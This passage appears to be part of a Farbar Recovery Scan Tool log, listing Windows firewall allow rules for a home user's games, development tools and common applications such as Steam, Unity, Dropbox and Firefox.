(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{2D648D5F-45BB-40E6-A13C-75F27A86F884}] => (Allow) D:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{DD32B9A1-1715-4303-AF22-2B0CEFB90996}] => (Allow) D:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [TCP Query User{36E2D361-3803-4699-8C6E-6D1B1E29A408}D:\downloads\withsix-play(1).exe] => (Allow) D:\downloads\withsix-play(1).exe
FirewallRules: [UDP Query User{B3EFC1B5-A17C-40FE-8D34-939EBF24F839}D:\downloads\withsix-play(1).exe] => (Allow) D:\downloads\withsix-play(1).exe
FirewallRules: [{39512476-EAC8-43EF-BF07-F0DB15C5028E}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\ARMA 2 Operation Arrowhead\ArmA2OA.exe
FirewallRules: [{D51686D4-225F-4565-A409-DB142E45C975}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\ARMA 2 Operation Arrowhead\ArmA2OA.exe
FirewallRules: [TCP Query User{125B86B4-2480-4762-BF1C-B2A3C1AF69C0}D:\dayz\beta_oa\arma2oa.exe] => (Allow) D:\dayz\beta_oa\arma2oa.exe
FirewallRules: [UDP Query User{3B560AB4-A4C1-49C6-9635-FC0F37ECFE39}D:\dayz\beta_oa\arma2oa.exe] => (Allow) D:\dayz\beta_oa\arma2oa.exe
FirewallRules: [{36ADBDB5-623D-4991-89BA-841B9F7A6D84}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\ProjectZomboid\ProjectZomboid64.exe
FirewallRules: [{3D52C5CC-0DE2-4A03-9D6F-61A681B52C68}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\ProjectZomboid\ProjectZomboid64.exe
FirewallRules: [TCP Query User{D4E76E74-895A-49FE-A7CB-5E3F072A5CF3}D:\program files (x86)\mirc\mirc.exe] => (Allow) D:\program files (x86)\mirc\mirc.exe
FirewallRules: [UDP Query User{75420C43-0E6C-42B6-A2CE-4C5A214CB7F0}D:\program files (x86)\mirc\mirc.exe] => (Allow) D:\program files (x86)\mirc\mirc.exe
FirewallRules: [{DEF7ACD5-6B29-4563-AF03-20544D8B06DE}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\team fortress 2\hl2.exe
FirewallRules: [{D51E4E29-AEDB-4B45-88B8-3E0133F9092D}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\team fortress 2\hl2.exe
FirewallRules: [TCP Query User{BAF3E577-5B34-48AF-82EE-9C94AD5AAC79}D:\files\backup\d drive\cryengine_pc_v3_4_5_6666_freesdk\bin64\editor.exe] => (Allow) D:\files\backup\d drive\cryengine_pc_v3_4_5_6666_freesdk\bin64\editor.exe
FirewallRules: [UDP Query User{90177174-4A00-4377-89D3-2AE624A20F1E}D:\files\backup\d drive\cryengine_pc_v3_4_5_6666_freesdk\bin64\editor.exe] => (Allow) D:\files\backup\d drive\cryengine_pc_v3_4_5_6666_freesdk\bin64\editor.exe
FirewallRules: [TCP Query User{726C2C70-FAD9-4064-A65A-B3AD6F20D160}D:\cryengine_build_pc_v3_5_8_2310_freesdk\bin64\editor.exe] => (Allow) D:\cryengine_build_pc_v3_5_8_2310_freesdk\bin64\editor.exe
FirewallRules: [UDP Query User{526DD237-669E-4CB9-A4E7-B4BC8410935B}D:\cryengine_build_pc_v3_5_8_2310_freesdk\bin64\editor.exe] => (Allow) D:\cryengine_build_pc_v3_5_8_2310_freesdk\bin64\editor.exe
FirewallRules: [{D000ADEC-DA7B-43C6-8941-462C84FE2D6E}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [TCP Query User{A91FBBC4-C133-4A9A-B1F3-DC6DE1D860B0}D:\program files (x86)\steam\steamapps\common\total war rome ii\rome2.exe] => (Allow) D:\program files (x86)\steam\steamapps\common\total war rome ii\rome2.exe
FirewallRules: [UDP Query User{CAA5062A-E803-4254-948A-8D43824B6173}D:\program files (x86)\steam\steamapps\common\total war rome ii\rome2.exe] => (Allow) D:\program files (x86)\steam\steamapps\common\total war rome ii\rome2.exe
FirewallRules: [{686B1DFA-C5BD-4D5A-8A15-517B23E3D512}] => (Allow) C:\Users\King\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{043313D4-D851-490E-872D-A265F2757C1C}] => (Allow) C:\Users\King\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{045302F9-77F1-4201-86DA-8C6EA8206703}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\ARMA 2 Operation Arrowhead\Expansion\beta\arma2oa.exe
FirewallRules: [{C4FF778D-8F27-42B0-AE0D-0CAB720D8FFB}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\ARMA 2 Operation Arrowhead\Expansion\beta\arma2oa.exe
FirewallRules: [TCP Query User{A873E998-B8EB-484A-B9DF-B078497DD88F}C:\program files\java\jre7\bin\javaw.exe] => (Allow) C:\program files\java\jre7\bin\javaw.exe
FirewallRules: [UDP Query User{E6266210-0691-4925-8E8A-53EE1F134B3D}C:\program files\java\jre7\bin\javaw.exe] => (Allow) C:\program files\java\jre7\bin\javaw.exe
FirewallRules: [TCP Query User{6C25E365-35B7-4FE5-8DC3-8235FC898835}C:\program files (x86)\java\jre7\bin\java.exe] => (Allow) C:\program files (x86)\java\jre7\bin\java.exe
FirewallRules: [UDP Query User{BE6F0CF2-8185-4D2C-925F-093B257EF769}C:\program files (x86)\java\jre7\bin\java.exe] => (Allow) C:\program files (x86)\java\jre7\bin\java.exe
FirewallRules: [{56740D8F-D5F6-4E35-8FFB-8E0560AC32FD}] => (Allow) LPort=1935
FirewallRules: [{0D1F6E19-36C1-427F-BE6C-408C9188964D}] => (Allow) LPort=1935
FirewallRules: [{D27878B0-0420-436E-8B15-13D61DFB64BE}] => (Allow) LPort=1935
FirewallRules: [{B9A5CD33-BF5C-40BF-B9C0-EC6ED6230944}] => (Allow) C:\Program Files (x86)\CheckPoint\ZoneAlarm\vsmon.exe
FirewallRules: [{42338679-9E69-4FCA-8525-2AF1069807EB}] => (Allow) C:\Program Files (x86)\CheckPoint\ZoneAlarm\vsmon.exe
FirewallRules: [{32C4FD29-DDAB-4ABF-838C-2641A1E6C913}] => (Allow) C:\Program Files (x86)\CheckPoint\ZoneAlarm\vsmon.exe
FirewallRules: [{22D33B98-AB47-4470-9DDD-45D78D6896C3}] => (Allow) C:\Program Files (x86)\CheckPoint\ZoneAlarm\vsmon.exe
FirewallRules: [{4C69778C-DF8B-4985-959D-CD3C3D527838}] => (Allow) C:\Users\King\AppData\Local\Google\Google Talk Plugin\googletalkplugin.exe
FirewallRules: [{191B258C-1364-413C-A156-F2C2C25585BD}] => (Allow) C:\Users\King\AppData\Local\Google\Google Talk Plugin\googletalkplugin.exe
FirewallRules: [{8A60B1E6-2BE6-467E-AA3B-1A29E420C5E2}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\SteamVR\drivers\oculus\utils\OculusConfigUtil.exe
FirewallRules: [{3EE2B75A-D6B0-45C1-9A66-D8E5DCA837B8}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\SteamVR\drivers\oculus\utils\OculusConfigUtil.exe
FirewallRules: [{4CB91135-2041-4D10-9D22-1127CA46138B}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\Warface\live\nw.exe
FirewallRules: [{C39665AC-58B4-4490-BBF5-16DA583C39B7}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\Warface\live\nw.exe
FirewallRules: [{3E2F10B6-4503-4AEC-BF2B-BD19C20E4099}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\ARMA 2 Operation Arrowhead\ArmA2OA_BE.exe
FirewallRules: [{63B7E8FB-1AEA-4BEC-9621-55590B91C84D}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\ARMA 2 Operation Arrowhead\ArmA2OA_BE.exe
FirewallRules: [{C8E6E6FB-3E12-48E8-B220-EA87B9E76704}] => (Allow) D:\Program Files (x86)\Winamp\winamp.exe
FirewallRules: [{0213F674-E8D8-4A5A-9226-22E612F986E1}] => (Allow) D:\Program Files (x86)\Winamp\winamp.exe
FirewallRules: [{8F05A078-4A66-40F9-B195-466B7CBB085B}] => (Allow) D:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{7035F6C4-5AB3-4A43-85CC-CF9ADD825A90}] => (Allow) D:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{69C2652B-7B30-4CE1-B1A0-2E2BB84331BC}] => (Allow) D:\Program Files (x86)\steam\Steam.exe
FirewallRules: [{970B5AE6-8E47-45E8-924B-A7357D09FF37}] => (Allow) D:\Program Files (x86)\steam\Steam.exe
FirewallRules: [{DA415390-53AF-4A2F-8498-9B9DD1E62FD6}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Skyrim\SkyrimLauncher.exe
FirewallRules: [{A7FB052D-D286-4D0D-98C9-90488A33CCE5}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Skyrim\SkyrimLauncher.exe
FirewallRules: [{A419E92B-4480-441F-982E-5911B575E654}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Grand Theft Auto IV\GTAIV\LaunchGTAIV.exe
FirewallRules: [{8EDBFE72-9359-4DDC-8CFB-D48E3D724F1D}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Grand Theft Auto IV\GTAIV\LaunchGTAIV.exe
FirewallRules: [{CB2E97B0-7A5C-451B-AB9A-7407181EA8EC}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Dreamfall Chapters\Dreamfall Chapters.exe
FirewallRules: [{D81CE293-BD6D-4FA3-B829-FDD98304B5C5}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Dreamfall Chapters\Dreamfall Chapters.exe
FirewallRules: [{8DFC9376-7DA8-4C8D-81D5-C01F9D415D34}] => (Allow) LPort=27016
FirewallRules: [{5C7F6878-24C4-4D55-8ED6-9698AF3AD1BD}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Total War Rome II\launcher\launcher.exe
FirewallRules: [{83555FF6-292E-49CE-BC99-452285CCE9EA}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Total War Rome II\launcher\launcher.exe
FirewallRules: [{0D070C38-8B83-430D-8511-6D62601A30F9}] => (Allow) D:\Program Files (x86)\EaseUS\Todo Backup\bin\Agent.exe
FirewallRules: [{FFAE59A3-28EA-4611-9D8A-09613B193A2E}] => (Allow) D:\Program Files (x86)\EaseUS\Todo Backup\bin\TodoBackupService.exe
FirewallRules: [{B3C28A1C-26C3-4B0D-A03F-621B6C8F2D92}] => (Allow) D:\Program Files (x86)\EaseUS\Todo Backup\bin\TodoBackupService.exe
FirewallRules: [{A94B644F-CFF3-4B1C-872A-4ECDB94E238D}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{F6CB4B8A-1BD4-4C10-868D-03DE96B557BA}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{721A7CDB-EC33-4381-AAA0-F74385149377}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{2C790162-FED4-408F-B33D-AC941633C960}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{553FC32E-BAE1-4ED2-BAB8-E4257ED11D61}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\ARMA 2 Operation Arrowhead\DLCsetup\PMC\datacachepreprocessor.exe
FirewallRules: [{E158C863-E699-4D4C-9C9F-17C1199E86DC}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\ARMA 2 Operation Arrowhead\DLCsetup\PMC\datacachepreprocessor.exe
FirewallRules: [{952C7F75-C5C8-46D2-8C99-089B6AD53FA4}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\ARMA 2 Operation Arrowhead\DLCsetup\BAF\datacachepreprocessor.exe
FirewallRules: [{C518AF8A-8A1D-4900-81CF-7D61340355E2}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\ARMA 2 Operation Arrowhead\DLCsetup\BAF\datacachepreprocessor.exe
FirewallRules: [{FA18EE3A-06E8-437C-BC77-4DCE0797BBD7}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Arma 2\arma2.exe
FirewallRules: [{B8DA9097-3D52-410A-9D70-460A1BBB58CB}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Arma 2\arma2.exe
FirewallRules: [{EA3A0740-A4D8-4937-A1A3-57B5668915AC}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{50C781F4-86E3-40FC-AD2A-76B273087F58}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{B1E411DB-AA9B-4990-8DE8-6A1ADA6E1A8B}] => (Allow) C:\SteamLibrary\steamapps\common\Arma 3\arma3.exe
FirewallRules: [{D0527DD2-96E0-44AC-8A2C-611D10122D6F}] => (Allow) C:\SteamLibrary\steamapps\common\Arma 3\arma3.exe
FirewallRules: [{0D028FF7-6A0E-4AB3-991E-B1DB6BF96117}] => (Allow) C:\SteamLibrary\steamapps\common\Arma 3\arma3launcher.exe
FirewallRules: [{D9B829C8-F337-4084-A047-ADBFD9D29B44}] => (Allow) C:\SteamLibrary\steamapps\common\Arma 3\arma3launcher.exe
FirewallRules: [{5C3EDD6C-5A88-49DB-BB52-8867EA59F523}] => (Allow) D:\Program Files (x86)\Origin Games\The Sims 4\Game\Bin\TS4.exe
FirewallRules: [{F650729A-8E98-4270-8197-70DAE9006F4A}] => (Allow) D:\Program Files (x86)\Origin Games\The Sims 4\Game\Bin\TS4.exe
FirewallRules: [{C9927348-99DE-4AD8-9E87-68336559B1EC}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Counter-Strike Global Offensive\bin\SDKLauncher.exe
FirewallRules: [{62A69FC2-3CF0-4900-BDD0-33838A6DF5B1}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Counter-Strike Global Offensive\bin\SDKLauncher.exe
FirewallRules: [TCP Query User{37B4A75B-6DA9-43C2-9F28-D580C887C4EF}C:\program files\java\jre7\bin\java.exe] => (Allow) C:\program files\java\jre7\bin\java.exe
FirewallRules: [UDP Query User{635DFB92-9DE7-4F24-8E81-DB6019B3EB89}C:\program files\java\jre7\bin\java.exe] => (Allow) C:\program files\java\jre7\bin\java.exe
FirewallRules: [TCP Query User{69B86087-81B8-438A-ADF8-18DB5FA0B9F2}R:\program files (x86)\ea games\mohaa\mohaa.exe] => (Allow) R:\program files (x86)\ea games\mohaa\mohaa.exe
FirewallRules: [UDP Query User{F1AB9636-09C6-4FB5-A7A2-E927F8148519}R:\program files (x86)\ea games\mohaa\mohaa.exe] => (Allow) R:\program files (x86)\ea games\mohaa\mohaa.exe
FirewallRules: [{576BAB11-6F1D-4342-BD3A-CC365C8B5AF1}] => (Allow) R:\SteamLibrary\steamapps\common\SourceSDK\bin\SDKLauncher.exe
FirewallRules: [{F363D4A9-1DFE-4562-AE6E-EBDCA325B371}] => (Allow) R:\SteamLibrary\steamapps\common\SourceSDK\bin\SDKLauncher.exe
FirewallRules: [TCP Query User{33DB4C35-22F4-4B52-A0FC-DB9C85C3A7CF}D:\program files (x86)\electronic arts\crytek\crysis wars\bin64\crysis.exe] => (Allow) D:\program files (x86)\electronic arts\crytek\crysis wars\bin64\crysis.exe
FirewallRules: [UDP Query User{AC5CC42E-5EBF-4B73-B224-C98D3F3F3406}D:\program files (x86)\electronic arts\crytek\crysis wars\bin64\crysis.exe] => (Allow) D:\program files (x86)\electronic arts\crytek\crysis wars\bin64\crysis.exe
FirewallRules: [{D8CE2171-CE13-4E9C-BFBD-42668160B39F}] => (Allow) R:\Program Files (x86)\Origin Games\Mass Effect\Binaries\MassEffect.exe
FirewallRules: [{D34F8F4D-36D9-4C09-9001-C3DCB4750760}] => (Allow) R:\Program Files (x86)\Origin Games\Mass Effect\Binaries\MassEffect.exe
FirewallRules: [TCP Query User{EEC974FE-FD66-4F26-906D-F27CF73CC277}R:\program files (x86)\unity\editor\unity.exe] => (Allow) R:\program files (x86)\unity\editor\unity.exe
FirewallRules: [UDP Query User{911A57C0-2C2C-4EC6-80F2-C81AA1A322B7}R:\program files (x86)\unity\editor\unity.exe] => (Allow) R:\program files (x86)\unity\editor\unity.exe
FirewallRules: [TCP Query User{0E164AF4-9371-4ADC-937D-5FC1CA1B7514}D:\program files\allegorithmic\bitmap2material\3.x\bitmap2material.exe] => (Allow) D:\program files\allegorithmic\bitmap2material\3.x\bitmap2material.exe
FirewallRules: [UDP Query User{4C613560-0578-4257-AC3C-D5BE7CD8AAC7}D:\program files\allegorithmic\bitmap2material\3.x\bitmap2material.exe] => (Allow) D:\program files\allegorithmic\bitmap2material\3.x\bitmap2material.exe
FirewallRules: [TCP Query User{D0872996-1ACB-47C6-A914-D9BF59CFCC3D}R:\program files\unity\editor\unity.exe] => (Allow) R:\program files\unity\editor\unity.exe
FirewallRules: [UDP Query User{ACB786F3-182E-4B04-8EC4-92C4AEE48669}R:\program files\unity\editor\unity.exe] => (Allow) R:\program files\unity\editor\unity.exe
FirewallRules: [TCP Query User{C8194FEF-C873-43A2-9D69-EE3C55E949A5}R:\mech_game\mech game\mech_game.exe] => (Allow) R:\mech_game\mech game\mech_game.exe
FirewallRules: [UDP Query User{5ECACB08-D4AC-4D4E-9971-CA366093E96E}R:\mech_game\mech game\mech_game.exe] => (Allow) R:\mech_game\mech game\mech_game.exe
FirewallRules: [TCP Query User{390A7C8C-A2F6-49DB-8D32-BD5252CBA2B8}C:\program files (x86)\mozilla firefox\plugin-container.exe] => (Allow) C:\program files (x86)\mozilla firefox\plugin-container.exe
FirewallRules: [UDP Query User{A7F39972-CF54-4509-98C5-1880F3E23B59}C:\program files (x86)\mozilla firefox\plugin-container.exe] => (Allow) C:\program files (x86)\mozilla firefox\plugin-container.exe
FirewallRules: [TCP Query User{FFC28CFE-6626-4DD8-9B78-FA741047D8BB}C:\program files (x86)\mozilla firefox\firefox.exe] => (Allow) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [UDP Query User{4F9E5C9E-08CD-4B58-8A92-A86319F9FFD0}C:\program files (x86)\mozilla firefox\firefox.exe] => (Allow) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [{D1C4F2FA-875C-4EA8-AD01-D47EE0CBE4B8}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\SteamVR\demo\bin\win32\hellovr_sdl.exe
FirewallRules: [{12007852-4486-46A9-88B7-6A5C7EF8353B}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\SteamVR\demo\bin\win32\hellovr_sdl.exe
FirewallRules: [TCP Query User{91DBB666-1E87-4C93-A483-3806680C8896}D:\program files (x86)\trillian\trillian.exe] => (Allow) D:\program files (x86)\trillian\trillian.exe
FirewallRules: [UDP Query User{8DECB21E-0C18-45C8-88F0-0C8097A7A727}D:\program files (x86)\trillian\trillian.exe] => (Allow) D:\program files (x86)\trillian\trillian.exe
FirewallRules: [TCP Query User{9AAFE1D3-900D-47C6-9D40-66D1A1CC802C}R:\program files\rockstar games\grand theft auto v\gta5.exe] => (Allow) R:\program files\rockstar games\grand theft auto v\gta5.exe
FirewallRules: [UDP Query User{73331B2D-6D75-4482-8820-27A4A091107F}R:\program files\rockstar games\grand theft auto v\gta5.exe] => (Allow) R:\program files\rockstar games\grand theft auto v\gta5.exe
FirewallRules: [{9339C4AA-00B8-47AB-B66E-B29A2BBB1F79}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{C5BF7154-2F15-48F6-8A94-3EF0F85D437B}] => (Allow) LPort=2869
FirewallRules: [{40350AB1-C51C-4BF8-9BB9-C6D59348F362}] => (Allow) LPort=1900
FirewallRules: [{BD44A386-5C0E-4B9D-8192-60319B23E59D}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\SteamVR\tools\bin\win32\vrmonitor.exe
FirewallRules: [{67EFDA1C-327F-4532-80B3-83ADF3130446}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\SteamVR\tools\bin\win32\vrmonitor.exe
FirewallRules: [{F97ADAE6-FDDF-4E46-B26F-539B3C4F7794}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Alien Isolation\AI.exe
FirewallRules: [{6ADD9A4A-6469-4D0C-8928-42DFF1422ED6}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\Alien Isolation\AI.exe
FirewallRules: [{C5917053-F117-49F5-998B-36063E4A2623}] => (Allow) C:\SteamLibrary\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{76ED3EA8-BC3F-47BD-9843-FCD7C0D2746C}] => (Allow) C:\SteamLibrary\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{6BAC5308-AECA-4DFE-95B4-BDD714B1F412}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\dota 2 beta\dota.exe
FirewallRules: [{13994230-5EAF-4716-9D10-C33C01086648}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\dota 2 beta\dota.exe
FirewallRules: [TCP Query User{702A19EA-7FC4-438D-BE15-BD4CAD457087}D:\program files (x86)\steam\steamapps\common\dota 2 beta\game\bin\win32\dota2.exe] => (Allow) D:\program files (x86)\steam\steamapps\common\dota 2 beta\game\bin\win32\dota2.exe
FirewallRules: [UDP Query User{ACAFE845-95BF-48BE-A03C-AF73803FC984}D:\program files (x86)\steam\steamapps\common\dota 2 beta\game\bin\win32\dota2.exe] => (Allow) D:\program files (x86)\steam\steamapps\common\dota 2 beta\game\bin\win32\dota2.exe
FirewallRules: [{6E8D4E91-E598-4778-9F29-6CE9AE36E7D4}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\dota 2 beta\game\bin\win64\dota2cfg.exe
FirewallRules: [{62FFD780-17C5-4E5B-A30F-DA07F58C37EB}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\dota 2 beta\game\bin\win64\dota2cfg.exe
FirewallRules: [{C85EBC1E-67A1-4B4F-BBB7-1BA73F6191AD}] => (Allow) C:\Program Files (x86)\Common Files\Acronis\SyncAgent\syncagentsrv.exe
FirewallRules: [{63107B63-68F7-4729-B57C-A2FC67ADF879}] => (Allow) C:\Program Files (x86)\Common Files\Acronis\SyncAgent\syncagentsrv.exe
FirewallRules: [TCP Query User{1A468DE0-EB48-4C47-9847-3D29016A3672}R:\program files\unity\monodevelop\bin\monodevelop.exe] => (Allow) R:\program files\unity\monodevelop\bin\monodevelop.exe
FirewallRules: [UDP Query User{8B76DFE0-D9E5-418F-B1DF-CF01F0AD54FF}R:\program files\unity\monodevelop\bin\monodevelop.exe] => (Allow) R:\program files\unity\monodevelop\bin\monodevelop.exe
FirewallRules: [TCP Query User{31BF8F9D-AC7E-4AA4-BA6F-FBF23ED811AC}R:\networkstarter\networkstarter.exe] => (Allow) R:\networkstarter\networkstarter.exe
FirewallRules: [UDP Query User{9DF5C112-BE66-4559-A7F0-27BD8853DC5D}R:\networkstarter\networkstarter.exe] => (Allow) R:\networkstarter\networkstarter.exe
FirewallRules: [TCP Query User{23D999FE-BFE4-484D-AE68-C8D2D0A2639B}C:\users\king\desktop\mechgame\mech_game.exe] => (Allow) C:\users\king\desktop\mechgame\mech_game.exe
FirewallRules: [UDP Query User{2C444C14-15E7-4080-94A3-B92C5951FB5D}C:\users\king\desktop\mechgame\mech_game.exe] => (Allow) C:\users\king\desktop\mechgame\mech_game.exe
FirewallRules: [TCP Query User{74B5D83D-7220-42B1-9802-C2DD7235A16E}C:\users\king\appdata\roaming\dropbox\bin\dropbox.exe] => (Allow) C:\users\king\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [UDP Query User{BF1F6585-0EE5-4923-83FC-94BB654ACDA3}C:\users\king\appdata\roaming\dropbox\bin\dropbox.exe] => (Allow) C:\users\king\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [{035E7EF0-B4F1-4B7D-AB6D-49DFBF138642}] => (Allow) R:\SteamLibrary\steamapps\common\killingfloor2\Binaries\Win64\KFGame.exe
FirewallRules: [{4AF5A2C0-A602-4117-B4B3-8F0D2A626E0B}] => (Allow) R:\SteamLibrary\steamapps\common\killingfloor2\Binaries\Win64\KFGame.exe
FirewallRules: [{C1705A37-36D7-47AB-B414-E334EFF30476}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\BioShock Infinite\Binaries\Win32\BioShockInfinite.exe
FirewallRules: [{E0A76205-97A7-434C-A238-BAD43E4656C3}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\BioShock Infinite\Binaries\Win32\BioShockInfinite.exe
FirewallRules: [{E69B2FF9-2BFE-4F5E-B635-57ED2A8AF9E0}] => (Allow) R:\SteamLibrary\steamapps\common\killingfloor2\Binaries\Win64\KFGame.exe
FirewallRules: [{9CB93BEB-A02D-4C46-B21E-C01FE9717E38}] => (Allow) R:\SteamLibrary\steamapps\common\killingfloor2\Binaries\Win64\KFGame.exe
FirewallRules: [TCP Query User{2913D355-97F8-4A88-927F-46A0B922A071}D:\program files (x86)\mirc\mirc.exe] => (Allow) D:\program files (x86)\mirc\mirc.exe
FirewallRules: [UDP Query User{E3354716-66FA-499E-87C3-325DD14A1F87}D:\program files (x86)\mirc\mirc.exe] => (Allow) D:\program files (x86)\mirc\mirc.exe
FirewallRules: [TCP Query User{310E8940-C14E-4A0F-8715-42241174F30E}C:\program files\logitech gaming software\lcore.exe] => (Allow) C:\program files\logitech gaming software\lcore.exe
FirewallRules: [UDP Query User{B0A9FF95-0324-46C5-B8ED-0C0162556FF0}C:\program files\logitech gaming software\lcore.exe] => (Allow) C:\program files\logitech gaming software\lcore.exe
FirewallRules: [{7056697D-2EA5-4BEE-A0AF-60D7950C3FFB}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\PlanetSide 2\LaunchPad.exe
FirewallRules: [{D4479628-2A67-4859-A5FD-A2C76C9AFC75}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\PlanetSide 2\LaunchPad.exe
FirewallRules: [TCP Query User{23089EEF-E634-4899-98F7-8ECDF432F679}R:\program files\rockstar games\grand theft auto v\gta5.exe] => (Allow) R:\program files\rockstar games\grand theft auto v\gta5.exe
FirewallRules: [UDP Query User{996D63D0-F4FD-4239-B50B-75F775D9824B}R:\program files\rockstar games\grand theft auto v\gta5.exe] => (Allow) R:\program files\rockstar games\grand theft auto v\gta5.exe
FirewallRules: [TCP Query User{955A64A3-0B29-4C72-8007-FBEE589DE12F}D:\program files (x86)\electronic arts\crytek\crysis wars\bin64\crysis.exe] => (Allow) D:\program files (x86)\electronic arts\crytek\crysis wars\bin64\crysis.exe
FirewallRules: [UDP Query User{90579E89-7A13-4AED-8D4B-33BB82E44375}D:\program files (x86)\electronic arts\crytek\crysis wars\bin64\crysis.exe] => (Allow) D:\program files (x86)\electronic arts\crytek\crysis wars\bin64\crysis.exe
FirewallRules: [TCP Query User{E23D88E6-C831-4F79-901A-8BF31AE76723}D:\program files (x86)\steam\steamapps\common\planetside 2\planetside2_x64.exe] => (Allow) D:\program files (x86)\steam\steamapps\common\planetside 2\planetside2_x64.exe
FirewallRules: [UDP Query User{5645BF1C-86A9-431A-8B2F-DD2FAC0386F0}D:\program files (x86)\steam\steamapps\common\planetside 2\planetside2_x64.exe] => (Allow) D:\program files (x86)\steam\steamapps\common\planetside 2\planetside2_x64.exe
FirewallRules: [TCP Query User{D2F61D2E-C476-4110-B4D1-F329EB9DA54F}R:\program files\unity\editor\unity.exe] => (Allow) R:\program files\unity\editor\unity.exe
FirewallRules: [UDP Query User{500B7E9D-016B-49B6-8C94-5D331D4AAC44}R:\program files\unity\editor\unity.exe] => (Allow) R:\program files\unity\editor\unity.exe
FirewallRules: [{3B8C0169-A535-4AEC-9F41-CE7D53B6C35C}] => (Allow) C:\Program Files (x86)\Microsoft Visual Studio 14.0\Common7\IDE\devenv.exe
FirewallRules: [TCP Query User{20A77DC0-0BE9-4BC3-9029-4DF1F130AE53}C:\users\king\desktop\mechgame\mech_game.exe] => (Allow) C:\users\king\desktop\mechgame\mech_game.exe
FirewallRules: [UDP Query User{CBA1C25E-F366-41F9-A3D9-5ED748CF080E}C:\users\king\desktop\mechgame\mech_game.exe] => (Allow) C:\users\king\desktop\mechgame\mech_game.exe
FirewallRules: [TCP Query User{8A537426-520D-4BF1-B1CB-5BAC9943F0FF}D:\program files\unity\editor\unity.exe] => (Allow) D:\program files\unity\editor\unity.exe
FirewallRules: [UDP Query User{94DD2762-B1BA-4894-908E-1FC70028B2E8}D:\program files\unity\editor\unity.exe] => (Allow) D:\program files\unity\editor\unity.exe
FirewallRules: [TCP Query User{FD6B2D83-BDAC-4D9E-9587-34CB6EBA8A90}C:\users\king\appdata\roaming\dropbox\bin\dropbox.exe] => (Allow) C:\users\king\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [UDP Query User{8BB90BBD-0C3D-4ED6-B2FB-A4DEB5CDF987}C:\users\king\appdata\roaming\dropbox\bin\dropbox.exe] => (Allow) C:\users\king\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [{8B311CA8-F6AF-4745-BBB1-D77DF1E9D44E}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\counter-strike source\hl2.exe
FirewallRules: [{19710464-30DD-4781-A66B-6149B9242EC5}] => (Allow) D:\Program Files (x86)\steam\steamapps\common\counter-strike source\hl2.exe
FirewallRules: [{102C732D-1530-4108-A8FD-4B70816306FE}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{45815966-25B3-4FB3-8C7E-F87B224DE68B}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
